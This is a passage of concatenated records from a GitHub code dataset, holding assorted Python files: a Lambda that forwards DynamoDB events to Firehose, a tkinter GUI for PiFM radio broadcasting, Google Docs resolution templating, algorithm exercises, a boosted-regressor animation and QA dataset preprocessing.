(int(np.unique(raw_data[11:,2])[-1])+1)\ncmd_count\n\n\n# In[137]:\n\n\n\nfind_delay = np.where((data[:,2] == \"0\"))[0]\n\nfor idx in range(len(find_delay)):\n if find_delay[idx] + 1 != find_delay[idx+1]:\n delay = find_delay[idx]+1\n break\nprint(delay)\n\n# print(delay)\n# find_repeat = data[:,1]\n# for idx in range(find_repeat):\n# if (find_repeat[idx])\n# print(idx)\n# print(find_repeat)\n\n\n# In[187]:\n\n\n# switch\n# led 24 - 34\n# seg_0 35 - 43\n# seg_1 44 - 52\n# seg_2 53 - 61\n# seg_3 62 - 70\nprint(delay)\n\ncmd_sub_idx = [[24,34], [35, 43], [44, 52], [53, 61], [62, 70]]\noutput_key = [\"led\", \"seg_0\", \"seg_1\", \"seg_2\", \"seg_3\"]\noutput_seg = {\"output\":[]}\ndef cmd_parse1():\n for cmd in range(cmd_count):\n tmp = {}\n if cmd == 0:\n cmd_idx = cmd + 1\n else:\n cmd_idx = cmd * delay\n for sub_idx, key in zip(cmd_sub_idx, output_key):\n tmp[key] = list((data[cmd_idx,sub_idx[0]:sub_idx[1]].astype(int) +1) % 2)\n# tmp[key] = list()[::-1]\n\n# print(tmp[key], end=\"\")\n# if key != \"led\" and tmp[key][-2]:\n# print(\"<-\")\n# else:\n# print()\n if key != \"led\":\n# print(key, end=\" \")\n# print(tmp[key])\n tmp[key].insert(-2, tmp[key][-2])\n tmp[key].insert(-2, tmp[key][-2])\n# print(key, end=\" \")\n# print(tmp[key])\n output_seg[\"output\"].append(tmp)\ncmd_parse1()\nprint(output_seg)\njson.dumps(output_seg, \"\")\n# print(output_seg['output'][0]['led'][::-1])\n# print(output_seg['output'][0]['led'])\n\n\n# In[114]:\n\n\ndef cmd_parse2():\n for cmd in range(cmd_count):\n # data[]\n if cmd == 0:\n cmd_idx = cmd + 1\n else:\n cmd_idx = cmd * delay\n led = data[cmd_idx,sub_idx[0]:sub_idx[1]]\n seg_0 = data[cmd_idx,35:43]\n seg_1 = data[cmd_idx,44:52]\n seg_2 = data[cmd_idx,53:61]\n seg_3 = data[cmd_idx,62:70]\n print(seg_3)\n\n","repo_name":"yutse-chen/vlab","sub_path":"json_test.py","file_name":"json_test.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12060430024","text":"import json\n\nimport boto3\n\nfrom core_lib.services.database.impl.dynamodb_service import dynamodb_json_to_json\nfrom core_lib.services.parameter.parameter_service import (\n get_parameter_value,\n ParameterName,\n)\nfrom core_lib.utils.lambda_util import lambda_handler\nfrom core_lib.utils.log_util import log_unexpected_exception, log_warning, log_info\nfrom user.user_lifecycle_events import handle_user_event\n\nfirehose = boto3.client(\"firehose\")\nFIREHOSE_DELIVERY_STREAM = None\n\n\ndef get_firehose_delivery_stream():\n global FIREHOSE_DELIVERY_STREAM\n\n if FIREHOSE_DELIVERY_STREAM is None:\n FIREHOSE_DELIVERY_STREAM = get_parameter_value(\n parameter_name=ParameterName.FIREHOSE_DELIVERY_STREAM\n )\n\n return FIREHOSE_DELIVERY_STREAM\n\n\n@lambda_handler()\ndef handle_db_event(event):\n records = event.get(\"Records\", [])\n\n for record in records:\n try:\n db_event = record.get(\"dynamodb\", {})\n event_name = record.get(\"eventName\")\n old_image = dynamodb_json_to_json(db_event.get(\"OldImage\", {}))\n new_image = dynamodb_json_to_json(db_event.get(\"NewImage\", {}))\n entity_type = (\n new_image.get(\"entity_type\")\n if event_name in [\"INSERT\", \"MODIFY\"]\n else old_image.get(\"entity_type\")\n )\n\n if not entity_type:\n log_warning(f\"missing EntityType attribute: {new_image}\")\n continue\n entity_type_handler = ENTITY_TYPES.get(entity_type)\n\n if not entity_type_handler:\n log_warning(f\"missing entity_type_handler for entity: {entity_type}\")\n continue\n\n entity_type_handler(event_name, old_image, new_image)\n\n put_firehose_record(event_name, old_image, new_image)\n\n except Exception as e:\n log_unexpected_exception(e)\n\n\nENTITY_TYPES = {\"user\": handle_user_event}\n\n\ndef put_firehose_record(event_name, old_image, new_image):\n record = new_image if event_name in [\"INSERT\", \"MODIFY\"] else old_image\n\n if event_name == \"REMOVE\":\n record[\"is_hard_deleted\"] = True\n\n delivery_stream_name = get_firehose_delivery_stream()\n log_info(\n f\"putting record to firehose delivery stream: {delivery_stream_name} record: {record}\"\n )\n\n firehose.put_record(\n DeliveryStreamName=delivery_stream_name,\n Record={\"Data\": json.dumps(record)},\n )\n","repo_name":"ianballard/aws-prod-ready","sub_path":"async/database_event/database_event_handler.py","file_name":"database_event_handler.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"37507327086","text":"#!/usr/bin/python3.6\n\nimport os\nimport webbrowser\ntry:\n import tkinter as tk\n from tkinter import filedialog\n from tkinter import END\nexcept ImportError:\n import Tkinter as tk\n from Tkinter import filedialog\n from Tkinter import END\n\n\n\n\ndef display(a, b=\"Error!\", c='200x100', d=(60, 60)):\n \"\"\"GUI Message Box\"\"\"\n def dest(r):\n r.destroy()\n return\n\n root = tk.Tk()\n root.geometry(c)\n root.title(b)\n root.config(background=back_color)\n msg = tk.Label(root,\n text=a,\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0)\n butt = tk.Button(root,\n text=\"OK\",\n width=7,\n command=lambda: dest(root),\n highlightthickness=0,\n bg=fore_color)\n msg.place(x=25, y=15)\n butt.place(x=d[0], y=d[1])\n root.protocol(\"WM_DELETE_WINDOW\", lambda: exit())\n root.mainloop()\n return\n\n\ndef play(file_path, freq):\n \"\"\"Air the given audio file via pifm\"\"\"\n if file_path == \"\":\n display(\"No File Selected\")\n if freq == \"\":\n display(\"No Frequency Selected\")\n try:\n _test = float(freq)\n del _test\n except ValueError:\n display(\"Incorrect Frequency\\nInput\")\n exit()\n if (float(low_freq) > float(freq)) or (float(freq) > float(high_freq)):\n display('Frequency out of\\nrange')\n exit()\n try:\n if file_path.split('/')[-1][-1:-4:-1] == '3pm':\n os.system(f\"ffmpeg -i '{file_path}' -f s16le -ar 22.05k -ac 1 - | sudo ./pifm - {freq}\")\n elif file_path.split('/')[-1][-1:-4:-1] == 'vaw':\n os.system(f\"sudo ./pifm '{file_path}' {freq} 22050 stereo\")\n else:\n display(\"Invalid File Type\")\n exit()\n except Exception:\n display(\"Somthing's Wrong...Exiting\")\n exit()\n except IOError:\n display(\"Error in File...Exiting\")\n exit()\n \n\ndef file_dialog(b):\n \"\"\"GUI File Dialog\"\"\"\n \n def cls(a):\n a.destroy()\n return\n \n global file_path\n sel_file_label = tk.Label(b,\n text=\"\",\n bg=back_color,\n highlightthickness=0,\n width=20,\n )\n sel_file_label.place(x=20,y=40)\n b.update()\n file_path = filedialog.askopenfilename(initialdir=def_dir, title=\"\", filetypes=(\n ('MP3 Audio File','.mp3'),('WAV Audio File','*.wav')))\n try:\n sel_file_label.config(text=file_path.split('/')[-1])####\n except AttributeError:\n display('Select a File')\n exit()\n b.update()\n\ndef view_info():\n webbrowser.open('https://www.radioreference.com/apps/db/', 2)\n return\n \n\ndef settings(_fst=0):\n \"\"\"GUI Top Menu - Settings\"\"\"\n def destroy(a):\n nonlocal _fst\n if _fst == 1:\n exit()\n else:\n a.destroy()\n \n\n def apply(a,b,d,c):\n nonlocal _fst\n\n if a == \"\" or a == \"Not Set\":\n a = \"108.0\"\n if b == \"\" or b == \"Not Set\":\n b = \"80.0\"\n if float(a) <= float(b):\n c.destroy()\n display(\"Invalid Range\")\n exit()\n if _fst == 1:\n with open('settings.conf','w') as fl:\n fl.write('DEFAULT_FREQUENCY=99.9\\n')\n fl.write(f'DEFAULT_DIRECTORY={d}\\n')\n fl.write(f'HIGH_FREQUENCY={a}\\n')\n fl.write(f'LOW_FREQUENCY={b}\\n')\n elif _fst == 0:\n with open('settings.conf','r') as fl:\n data = fl.readline()\n with open('settings.conf','w') as fl:\n fl.write(data)\n fl.write(f'DEFAULT_DIRECTORY={d}\\n')\n fl.write(f'HIGH_FREQUENCY={a}\\n')\n fl.write(f'LOW_FREQUENCY={b}\\n')\n c.destroy()\n return\n \n global high_freq\n global low_freq\n global def_dir\n root = tk.Tk()\n root.title('Settings')\n root.geometry('280x120')\n root.protocol(\"WM_DELETE_WINDOW\", lambda: destroy(root))\n root.config(background=back_color)\n high_label = tk.Label(root,\n text=\"High Frequency-\",\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0)\n low_label = tk.Label(root,\n text=\"Low Frequency-\",\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0)\n high_entry = tk.Entry(root,\n highlightthickness=0,\n width=10)\n low_entry = tk.Entry(root,\n highlightthickness=0,\n width=10\n )\n butt = tk.Button(root,\n text=\"Apply\",\n width=7,\n command=lambda: apply(high_entry.get(),low_entry.get(),def_entry.get(),root),\n highlightthickness=0,\n bg=fore_color,\n )\n def_label = tk.Label(root,\n text=\"Default Directory-\",\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n def_entry = tk.Entry(root,\n highlightthickness=0,\n width=10,\n )\n high_entry.insert(END, high_freq)\n low_entry.insert(END, low_freq)\n def_entry.insert(END, def_dir)\n high_label.place(x=10,y=20)\n low_label.place(x=10,y=40)\n high_entry.place(x=170,y=20)\n low_entry.place(x=170,y=40)\n def_label.place(x=10,y=60)\n def_entry.place(x=170,y=60)\n butt.place(x=95,y=90)\n root.mainloop()\n \ndef about():\n \"\"\"GUI Top Menu - About\"\"\"\n root = tk.Tk()\n root.title(\"About Pi Radio\")\n root.geometry('150x130')\n root.protocol(\"WM_DELETE_WINDOW\", lambda: root.destroy())\n root.config(background=back_color)\n title = tk.Label(root,\n text='Pi Radio',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n desc = tk.Label(root,\n text='Version: 1.0\\nGUI for PiFM\\nMade by Vignesh',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n but = tk.Button(root,\n text=\"Contact\",\n command=lambda: webbrowser.open('https://www.github.com/VigneshBurugina',2),\n highlightthickness=0,\n bg=fore_color,\n )\n title.place(x=45, y=10)\n desc.place(x=20,y=30)\n but.place(x=40,y=90)\n root.mainloop()\n \n \ndef main_menu():\n \"\"\"GUI Main Menu\"\"\"\n root = tk.Tk()\n root.title('Pi Radio')\n root.geometry('230x130')\n root.config(background=back_color)\n root.protocol(\"WM_DELETE_WINDOW\", lambda: exit())\n menubar = tk.Menu(root)\n menu1 = tk.Menu(menubar, tearoff=0)\n menu1.add_command(label=\"Frequency Reference\", command=lambda: view_info())\n menu1.add_command(label=\"Exit\", command=lambda: exit())\n menu2 = tk.Menu(menubar, tearoff=0)\n menu2.add_command(label=\"Settings\", command=lambda: settings())\n menu2.add_command(label=\"About\", command=lambda: about())\n menubar.add_cascade(label=\"Menu\", menu=menu1)\n menubar.add_cascade(label=\"Settings\", menu=menu2)\n root.config(menu=menubar)\n file_label = tk.Label(root,\n text='File:',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n freq_label = tk.Label(root,\n text='Frequency:',\n font=(\"Courier\", 10),\n bg=back_color,\n highlightthickness=0,\n )\n file_button = tk.Button(root,\n text='Select',\n width=7,\n command=lambda: file_dialog(root),\n highlightthickness=0,\n bg=fore_color,\n )\n freq_entry = tk.Entry(root,\n highlightthickness=0,\n width=10,\n )\n play_button = tk.Button(root,\n text='Play!',\n width=7,\n command=lambda: play(file_path,freq_entry.get()),\n highlightthickness=0,\n bg=fore_color,\n )\n freq_entry.insert(END, def_freq)\n file_label.place(x=20,y=10)\n freq_label.place(x=20,y=70)\n file_button.place(x=120,y=10)\n freq_entry.place(x=120,y=70)\n play_button.place(x=75,y=100)\n root.mainloop()\n \n \nback_color = '#CAE1F4'\nfore_color = '#7ABDE4'\nfile_path = \"\"\n \nif __name__ != '__main__':\n display('Run main.py')\n exit()\n \n\nif 'settings.conf' not in os.listdir():\n display('First Time?\\nSet Settings','Pi Radio')\n high_freq = 'Not Set'\n low_freq = 'Not Set'\n def_dir = 'Not Set'\n settings(1)\n \n_c = 0\nwith open('settings.conf','r') as fl:\n data = fl.readlines()\nfor i in data:\n if \"HIGH_FREQUENCY=\" in i:\n _c += 1\n high_freq = i[15:-1]\n elif \"LOW_FREQUENCY=\" in i:\n _c += 1\n low_freq = i[14:-1]\n elif \"DEFAULT_FREQUENCY=\" in i:\n _c += 1\n def_freq = i[18:-1]\n elif \"DEFAULT_DIRECTORY=\" in i:\n _c += 1\n def_dir = i[18:-1]\n else:\n pass\nif _c != 4:\n display(\"Invalid Config File\")\n exit()\n \n\nmain_menu()\n \n \n ","repo_name":"VigneshBurugina/Pi-Radio","sub_path":"pi_radio.py","file_name":"pi_radio.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"70877450958","text":"# Find maximum product subarray in a given array\n# Given an array of integers, find maximum product subarray.\n# In other words, find a sub-array that has maximum product of its elements.\n# Input: { -6, 4, -5, 8, -10, 0, 8 }\n# Output: The maximum product sub-array is {4, -5, 8, -10} having product 1600\n# Input: { 40, 0, -20, -10 }\n# Output: The maximum product sub-array is {-20, -10} having product 200\n\nfrom typing import List\n\n\ndef findMaximumProductSubArr(arr: List[int]):\n maxEnding = 0\n minEnding = 0\n maxCurrent = 0\n\n for i in range(len(arr)):\n tmp = maxEnding\n maxEnding = max(arr[i], max(arr[i]*maxEnding, arr[i]*minEnding))\n minEnding = min(arr[i], min(arr[i]*tmp, arr[i]*minEnding))\n maxCurrent = max(maxEnding, maxCurrent)\n\n print('The maximum product of a sub-array is', maxCurrent)\n\n\narray = [-6, 4, -5, 8, -10, 0, 8]\narray1 = [40, 0, -20, -10]\narray2 = [-6, 0, 0]\narray3 = [0, 0, 0]\nfindMaximumProductSubArr(array)\n","repo_name":"tdkseraph/algorithm","sub_path":"array/findMaximumProductSubarr.py","file_name":"findMaximumProductSubarr.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37228613402","text":"import ResolutionManager.environment as env\nfrom ResolutionManager.Repositories.DocumentRepository import DocumentRepository\nfrom ResolutionManager.Repositories.FileRepository import FileRepository\nfrom ResolutionManager.Repositories.ResolutionRepository import ResolutionRepository\nfrom ResolutionManager.API.CredentialsManager import CredentialsManager\nimport sys\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\nHEADER_TEMPLATE = \"AS-{resolution_number}-{year}/{committee}\"\n\nclass ResolutionTemplateRepository(object):\n\n def __init__(self, plenary=None, dao=None):\n self.dao = dao\n self.plenary = plenary\n self.doc_repo = DocumentRepository()\n self.file_repo = FileRepository()\n self.cred_manager = CredentialsManager()\n self.resolution_repo = ResolutionRepository(dao)\n\n self.service = build('docs', 'v1', credentials=self.cred_manager.creds)\n\n def update_title(self, resolution ):\n # def update_title(self, document_id, title):\n title_idxs = {'start_index': 54, 'end_index': 62}\n rez_number = {'start_index': 54, 'end_index': 62}\n\n title_start = title_idxs['start_index'] - 1\n title_end = title_idxs['start_index'] + len(resolution.title)\n\n\n # Make sure to order backwards so offsets don't change\n requests = [\n {\n 'insertText': {\n 'location': {\n 'index': title_start,\n },\n 'text': resolution.title\n\n }\n },\n\n {\n 'updateTextStyle': {\n 'range': {\n 'startIndex': title_start,\n 'endIndex': title_end\n },\n 'textStyle': {\n 'bold': True,\n },\n 'fields': 'bold,'\n }\n },\n {\n 'updateParagraphStyle': {\n 'range': {\n 'startIndex': title_start,\n 'endIndex': title_end\n },\n 'paragraphStyle': {\n 'alignment': 'CENTER'\n },\n 'fields': 'alignment'\n }\n },\n\n {\n 'deleteContentRange': {\n 'range': {\n 'startIndex': title_end,\n 'endIndex': title_end + 1 + len('[Title]'),\n }\n }},\n\n ]\n\n result = self.service.documents().batchUpdate(\n documentId=resolution.document_id, body={'requests': requests}).execute()\n\n return result\n\n def create_file_from_template(self, resolution, template_id=env.TEMPLATE_DOCUMENT_ID):\n # def create_file_from_template(self, folder_id, resolution_number, resolution_name,\n # template_id=env.TEMPLATE_DOCUMENT_ID):\n \"\"\"Uses the template to make a new resolution in the first readings folder\n returns Resolution object with document id of created resolution set\n \"\"\"\n filename = env.RESOLUTION_FILENAME_TEMPLATE.format(resolution_number=resolution.number,\n resolution_name=resolution.title)\n sys.stdout.write(f\"{resolution.__dict__}\")\n\n resolution.document_id = self.file_repo.copy_file(template_id, filename)\n self.resolution_repo.set_google_document_id(resolution, resolution.document_id)\n\n self.file_repo.move_file_to_folder(resolution.document_id, self.plenary.first_reading_folder_id)\n return resolution\n\n\n def make_header(self, resolution):\n # def make_header(self, resolution_number, year, committee, cosponsors=[]):\n\n # if self.plenary.year > 2000:\n # self.plenary.year = self.plenary.year - 2000\n\n v = HEADER_TEMPLATE.format(resolution_number=resolution.number, year=self.plenary.two_digit_year, committee=resolution.committee.abbreviation)\n if len(resolution.cosponsors) > 0:\n for c in resolution.cosponsors:\n v += f\"/{c.abbreviation}\"\n return v\n\n\n\n def update_header(self, resolution):\n # def update_header(self, document_id, resolution_number, committee, cosponsors=[]):\n txt = f\"{self.make_header(resolution)}\\n{self.plenary.formatted_plenary_date}\"\n # txt = f\"{self.make_header(resolution.number, self.plenary.year, resolution.committee, resolution.cosponsors)}\\n{self.plenary.formatted_plenary_date()}\"\n\n requests = [{\n \"insertText\": {\n \"location\": {\n \"segmentId\": env.TEMPLATE_HEADER_ID,\n \"index\": 0\n },\n \"text\": txt\n }\n }]\n # requests = [\n # {\n # \"createHeader\": {\n # \"sectionBreakLocation\": {\n # \"index\": 0\n # },\n # \"type\": \"DEFAULT\"\n # }\n # },\n # ]\n\n result = self.service.documents().batchUpdate(\n documentId=resolution.document_id, body={'requests': requests}).execute()\n\n print(result)\n\n\n","repo_name":"AdamSwenson/ascsu-resolutions-python","sub_path":"ResolutionManager/Repositories/ResolutionTemplateRespository.py","file_name":"ResolutionTemplateRespository.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70440437200","text":"n = int(input())\r\nk = int(input())\r\n\r\nmemo = {}\r\n\r\n# n : slices\r\n# k : ppl\r\ndef solve(n, k):\r\n if (n, k) in memo:\r\n return memo[(n, k)]\r\n \r\n # if # of slices < # of ppl, return 0\r\n # because each person must get at least one slice\r\n if n < k:\r\n return 0 \r\n \r\n # if # of slices == # of ppl or # of ppl == 1, return 1\r\n # if the # of slices == # of ppl, each person gets 1 slice\r\n # if there is only one person, that person gets all the slices\r\n if n == k or k == 1:\r\n return 1\r\n \r\n # otherwise, we can either give each person one slice and continue\r\n # or we can give one person one slice and get rid of them from the line\r\n memo[(n,k)] = solve(n-1, k-1) + solve(n-k, k)\r\n return memo[(n, k)]\r\n\r\nprint(solve(n, k))","repo_name":"brokentelescope/CCC-Solutions","sub_path":"15/CCC '15 J5 - π-day.py","file_name":"CCC '15 J5 - π-day.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"42150909902","text":"from utils.matrix_generator import random_matrix_generator\nfrom commons import print_square_matrix\n\ndef martix_multiply(mat_a, mat_b):\n n = len(mat_a)\n mat_c = [ [ 0 for i in range(n) ] for j in range(n) ]\n for i in range(0, n):\n for j in range(0, n):\n sum = 0\n for k in range(0, n):\n sum += mat_a[i][k] * mat_b[k][j]\n mat_c[i][j] = sum\n return mat_c\n\nif __name__=='__main__':\n n = 4\n max_limit = 100\n mat_a = random_matrix_generator(n, 10)\n mat_b = random_matrix_generator(n, 10)\n mat_c = martix_multiply(mat_a, mat_b)\n print(\"Matrix A\")\n print_square_matrix(mat_a)\n print(\"---------\")\n print(\"Matrix B\")\n print_square_matrix(mat_b)\n print(\"---------\")\n print(\"Result, Matrix C\")\n print_square_matrix(mat_c)\n print(\"---------\")","repo_name":"Niranjan-Ananth/DS-and-Algorithms","sub_path":"CLRS/Chapter4/matrix_multiplication_brute_force.py","file_name":"matrix_multiplication_brute_force.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31556027485","text":"\"\"\"\nAnimated visualization of how boosted regression tree works\n\"\"\"\nimport numpy as np\n\nfrom vanilla_ml.supervised.regression.decision_tree_regressor import DecisionTreeRegressor\n\n# import matplotlib\n# matplotlib.rcParams[\"animation.convert_path\"] = \"Full path to ImageMagick's convert.exe\"\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\n\nfrom vanilla_ml.supervised.regression.gradient_boosted_regressor import GradientBoostedRegressor\nfrom vanilla_ml.util.metrics.rmse import rmse_score\n\n\ndef viz():\n # Prepare data\n X = np.arange(0, 10, 0.1)\n test_y = X * np.sin(X)\n # e = np.random.normal(0, 1, size=len(X))\n # train_y = test_y + e\n train_y = test_y.copy()\n X = X[:, None]\n print(\"X's shape = %s, train_y's shape = %s, test_y's shape = %s\"\n % (X.shape, train_y.shape, test_y.shape))\n\n # Visualize\n fig, ax = plt.subplots(1, 1, sharex=True, sharey=True, figsize=[7, 7], facecolor='w')\n ani = animation.FuncAnimation(fig, run_boosted_regression_tree, range(25),\n fargs=(X, train_y, test_y, ax),\n blit=False, interval=1000, repeat=True)\n plt.show()\n # ani.save('BoostedRegressor.gif', writer='imagemagick')\n\n\ndef run_boosted_regression_tree(i, X, train_y, test_y, ax):\n\n base_regr = DecisionTreeRegressor()\n regr = GradientBoostedRegressor(base_regr, num_rounds=i + 1, alpha=0.1)\n\n print(\"\\n* Iteration = %d\" % (i + 1))\n print(\"Fitting ...\")\n regr.fit(X, train_y)\n\n print(\"Predicting ...\")\n pred_y = regr.predict(X)\n train_rmse = rmse_score(train_y, pred_y)\n test_rmse = rmse_score(test_y, pred_y)\n # print(\"Train RMSE = %g, test RMSE = %g\" % (train_rmse, test_rmse))\n print(\"Train RMSE = %g\" % train_rmse)\n\n ax.cla()\n ax.set_ylim([train_y.min() - 1, train_y.max() + 1])\n ax.plot(X, train_y, 'r')\n ax.plot(X, test_y, 'g')\n ax.plot(X, pred_y, 'b')\n # ax.set_title('Iteration %d, training RMSE = %g, test RMSE = %g' % (i + 1, train_rmse, test_rmse))\n ax.set_title('Iteration %d, training RMSE = %g' % (i + 1, train_rmse))\n\n\nif __name__ == \"__main__\":\n viz()\n","repo_name":"vinhkhuc/VanillaML","sub_path":"vanilla_ml/viz/boosted_regressor_viz.py","file_name":"boosted_regressor_viz.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"29"} +{"seq_id":"18552282273","text":"import json\nimport itertools\nfrom collections import defaultdict, Counter\nimport numpy as np\nfrom nltk import word_tokenize\nimport torch\nfrom torch.utils.data import Dataset\nimport torch.nn.functional as F\nimport torch.nn as nn\n\nimport os\nimport pickle\n\n\ndef preprocess(data):\n \"\"\"\n Args:\n data (str):\n Returns: a list of tokens\n \"\"\"\n tokens = word_tokenize(data)\n return tokens\n\ndef process_data_quail(questions_file_name,key_file_name,save_file_name):\n with open(questions_file_name, 'rb') as f:\n data = json.load(f)\n with open(key_file_name, 'rb') as f:\n labels = json.load(f)\n stitched_data = []\n artical_list = list(data['data'].keys())\n for artical_idx in artical_list:\n artical = data['data'][artical_idx]\n context = artical['context']\n question_list = artical['questions'].keys()\n for quiz_idx in question_list:\n quiz = artical['questions'][quiz_idx]\n q = quiz['question']\n option_0 = quiz['answers']['0']\n option_1 = quiz['answers']['1']\n option_2 = quiz['answers']['2']\n option_3 = quiz['answers']['3']\n label = '<' + labels['data'][quiz_idx] + '>'\n paragraph = preprocess(context)\n q_and_a = [''] + preprocess(q) + ['<0>'] + preprocess(option_0) + \\\n ['<1>'] + preprocess(option_1) + ['<2>'] + preprocess(option_2) + ['<3>'] + preprocess(option_3)\n stitched_data.append([[paragraph,q_and_a],label])\n with open(save_file_name, 'wb') as f:\n pickle.dump(stitched_data, f)\n\ndef process_data_race(data_path, save_file_name):\n stitched_data = []\n for type in ['middle/','high/']:\n new_data_path = data_path + type\n artical_list = os.listdir(new_data_path)\n for artical in artical_list:\n artical_path = new_data_path + artical\n with open(artical_path, 'rb') as f:\n data = json.load(f)\n num_of_q = len(data['answers'])\n parag = data['article']\n parag = preprocess(parag)\n for i in range(num_of_q):\n label = data['answers'][i]\n if label=='A':\n label = '<0>'\n elif label=='B':\n label = '<1>'\n elif label=='C':\n label = '<2>'\n elif label=='D':\n label = '<3>'\n options = data['options'][i]\n question = data['questions'][i]\n option_0 = options[0]\n option_1 = options[1]\n option_2 = options[2]\n option_3 = options[3]\n q_and_a = [''] + preprocess(question) + ['<0>'] + preprocess(option_0) + \\\n ['<1>'] + preprocess(option_1) + ['<2>'] + preprocess(option_2) + ['<3>'] + preprocess(\n option_3)\n stitched_data.append([[parag, q_and_a], label])\n with open(save_file_name, 'wb') as f:\n pickle.dump(stitched_data, f)\n\n\n# class Vocabulary:\n# def __init__(self, special_tokens=None):\n# self.w2idx = {}\n# self.idx2w = {}\n# self.w2cnt = defaultdict(int)\n# self.special_tokens = special_tokens\n# if self.special_tokens is not None:\n# self.add_tokens(special_tokens)\n#\n# def add_tokens(self, tokens):\n# for token in tokens:\n# self.add_token(token)\n# self.w2cnt[token] += 1\n#\n# def add_token(self, token):\n# if token not in self.w2idx:\n# cur_len = len(self)\n# self.w2idx[token] = cur_len\n# self.idx2w[cur_len] = token\n#\n# def prune(self, min_cnt=2):\n# to_remove = set([token for token in self.w2idx if self.w2cnt[token] < min_cnt])\n# if self.special_tokens is not None:\n# to_remove = to_remove.difference(set(self.special_tokens))\n# for token in to_remove:\n# self.w2cnt.pop(token)\n# self.w2idx = {token: idx for idx, token in enumerate(self.w2cnt.keys())}\n# self.idx2w = {idx: token for token, idx in self.w2idx.items()}\n#\n# def __contains__(self, item):\n# return item in self.w2idx\n#\n# def __getitem__(self, item):\n# if isinstance(item, str):\n# return self.w2idx[item]\n# elif isinstance(item, int):\n# return self.idx2w[item]\n# else:\n# raise TypeError(\"Supported indices are int and str\")\n#\n# def __len__(self):\n# return (len(self.w2idx))\n\n\nclass Vocabulary:\n def __init__(self, special_tokens=None, glove_path='./data/glove.6B.50d.txt'):\n self.weights_matrix = {}\n self.glove_path = glove_path\n self.glove_dict = self.make_glove_dict()\n self.w2idx = {}\n self.idx2w = {}\n self.w2cnt = defaultdict(int)\n self.special_tokens = special_tokens\n if self.special_tokens is not None:\n self.add_tokens(special_tokens)\n\n def make_glove_dict(self):\n print(\"Loading Glove Model\")\n f = open(self.glove_path, 'r', encoding='utf-8')\n glove_dict = {}\n for line in f:\n splitLine = line.split()\n word = splitLine[0]\n embedding = np.array([float(val) for val in splitLine[1:]])\n glove_dict[word] = embedding\n print(\"Done.\", len(glove_dict), \" words loaded!\")\n return glove_dict\n\n def add_tokens(self, tokens):\n for token in tokens:\n self.add_token(token)\n self.w2cnt[token] += 1\n\n def add_token(self, token):\n if token not in self.w2idx:\n cur_len = len(self)\n self.w2idx[token] = cur_len\n self.idx2w[cur_len] = token\n if token in self.glove_dict:\n self.weights_matrix[cur_len] = self.glove_dict[token]\n else:\n self.weights_matrix[cur_len] = np.random.normal(scale=0.6,size=(50,))\n\n def prune(self, min_cnt=2):\n to_remove = set([token for token in self.w2idx if self.w2cnt[token] < min_cnt])\n if self.special_tokens is not None:\n to_remove = to_remove.difference(set(self.special_tokens))\n for token in to_remove:\n self.w2cnt.pop(token)\n self.w2idx = {token: idx for idx, token in enumerate(self.w2cnt.keys())}\n self.idx2w = {idx: token for token, idx in self.w2idx.items()}\n\n def __contains__(self, item):\n return item in self.w2idx\n\n def __getitem__(self, item):\n if isinstance(item, str):\n return self.w2idx[item]\n elif isinstance(item, int):\n return self.idx2w[item]\n else:\n raise TypeError(\"Supported indices are int and str\")\n\n def __len__(self):\n return (len(self.w2idx))\n\n\ndef transform_weight_mat(weights_matrix):\n # transform the format of weight matrix from dictionary to numpy array.\n voc_len = len(weights_matrix)\n new_weights_matrix = np.zeros((voc_len, 50))\n for i in range(voc_len):\n new_weights_matrix[i] = weights_matrix[i]\n return new_weights_matrix\n\n\ndef create_emb_layer(weights_matrix, non_trainable=False):\n num_embeddings, embedding_dim = weights_matrix.shape\n emb_layer = nn.Embedding(num_embeddings, embedding_dim)\n weights_matrix = torch.from_numpy(weights_matrix).type(torch.float32)\n emb_layer.load_state_dict({'weight': weights_matrix})\n if non_trainable:\n emb_layer.weight.requires_grad = False\n return emb_layer, num_embeddings, embedding_dim\n\nclass QADataset(Dataset):\n def __init__(self, texts, labels, vocab=None, labels_vocab=None, parag_max_len=40, q_and_a_max_len=40, lowercase=True):\n \"\"\"\n Args:\n texts (list): tokenized inputs, with format [paragraph, q_and_a]\n labels (list of str): the correponding labels of the dataset examples\n vocab (MyVocabulary, optional): vocabular to convert text to indices. If not provided, will be created based on the texts\n labels_vocab (MyVocabulary, optional): vocabular to convert labels to indices. If not provided, will be created based on the labels\n parag_max_len (int): maximum length of the paragraph. Texts shorter than parag_max_len will be cut at the end\n q_and_a_max_len (int): maximum length of the q_and_a(question and answers combination). Texts shorter than q_and_a_max_len will be cut at the end\n lowercase (bool, optional): a fag specifying whether or not the input text should be lowercased\n \"\"\"\n\n self.parag_max_len = parag_max_len\n self.q_and_a_max_len = q_and_a_max_len\n self.lowercase = lowercase\n\n self.parag = [self._pad(parag,is_parag=True) for parag,q_and_a in texts]\n self.q_and_a = 